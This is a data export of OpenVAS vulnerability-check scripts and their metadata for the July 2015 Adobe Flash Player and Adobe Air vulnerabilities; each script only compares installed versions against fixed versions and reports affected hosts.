Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any 
later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805904\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-07-08 14:25:09 +0530 (Wed, 08 Jul 2015)\");\n script_name(\"Adobe Flash Player Use-After-Free Vulnerability July15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is 
installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player versions before\n 11.2.202.481 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.481 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/561288\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-03.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_xref(name:\"URL\", value:\"http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = 
get_app_version(cpe:CPE)){\n exit(0);\n}\n\n## Fix will be updated once the solution details are available\nif(version_is_less(version:playerVer, test_version:\"11.2.202.481\"))\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + \"11.2.202.481\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:00", "description": "Gentoo Linux Local Security Checks GLSA 201507-13", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201507-13", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3113", "CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121394", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121394", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201507-13.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 
Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121394\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:56 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201507-13\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Adobe Flash Player. 
Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201507-13\");\n script_cve_id(\"CVE-2014-0578\", \"CVE-2015-3113\", \"CVE-2015-3114\", \"CVE-2015-3115\", \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\", \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\", \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\", \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\", \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\", \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\", \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\", \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\", \"CVE-2015-5119\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201507-13\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.481\"), vulnerable: make_list(\"lt 11.2.202.481\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2019-05-29T18:36:52", "description": "This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-07-09T00:00:00", "type": "openvas", "title": "Adobe Air Multiple Vulnerabilities-01 July15 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310805911", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805911", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_mult_vuln01_jul15_win.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Adobe Air Multiple Vulnerabilities-01 July15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805911\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-09 11:35:12 +0530 (Thu, 09 Jul 2015)\");\n script_name(\"Adobe Air Multiple Vulnerabilities-01 July15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An 
use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air versions before 18.0.0.180 on\n Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version 18.0.0.180\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air/Win/Installed\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"18.0.0.180\"))\n{\n report = 'Installed version: ' + airVer + '\\n' +\n 'Fixed version: ' + \"18.0.0.180\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:04", "description": "This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-07-09T00:00:00", "type": "openvas", "title": "Adobe Air Multiple Vulnerabilities-01 July15 (Mac OS 
X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310805912", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805912", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_mult_vuln01_jul15_macosx.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Adobe Air Multiple Vulnerabilities-01 July15 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805912\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-09 11:41:16 +0530 (Thu, 09 Jul 2015)\");\n script_name(\"Adobe Air Multiple Vulnerabilities-01 July15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An 
use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air versions before 18.0.0.180 on\n Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version 18.0.0.180\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Air/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"18.0.0.180\"))\n{\n report = 'Installed version: ' + airVer + '\\n' +\n 'Fixed version: ' + \"18.0.0.180\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:58", "description": "Mageia Linux Local Security Checks mgasa-2015-0273", "cvss3": {}, "published": "2015-10-15T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0273", "bulletinFamily": "scanner", 
"cvss2": {}, "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310130105", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130105", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0273.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130105\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:42:45 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0273\");\n script_tag(name:\"insight\", value:\"Adobe Flash Player 11.2.202.481 contains fixes to critical security vulnerabilities found in earlier versions that could potentially allow an attacker to take control of the affected system.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0273.html\");\n script_cve_id(\"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\", \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\", \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\", \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\", \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\", \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\", \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\", \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\", \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\", \"CVE-2015-5119\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", 
value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0273\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"flash-player-plugin\", rpm:\"flash-player-plugin~11.2.202.481~1.mga5.nonfree\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:13:14", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "openvas", "title": "Adobe Flash Player Use-After-Free Vulnerability July15 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805903", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310805903", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Use-After-Free Vulnerability July15 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805903\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", 
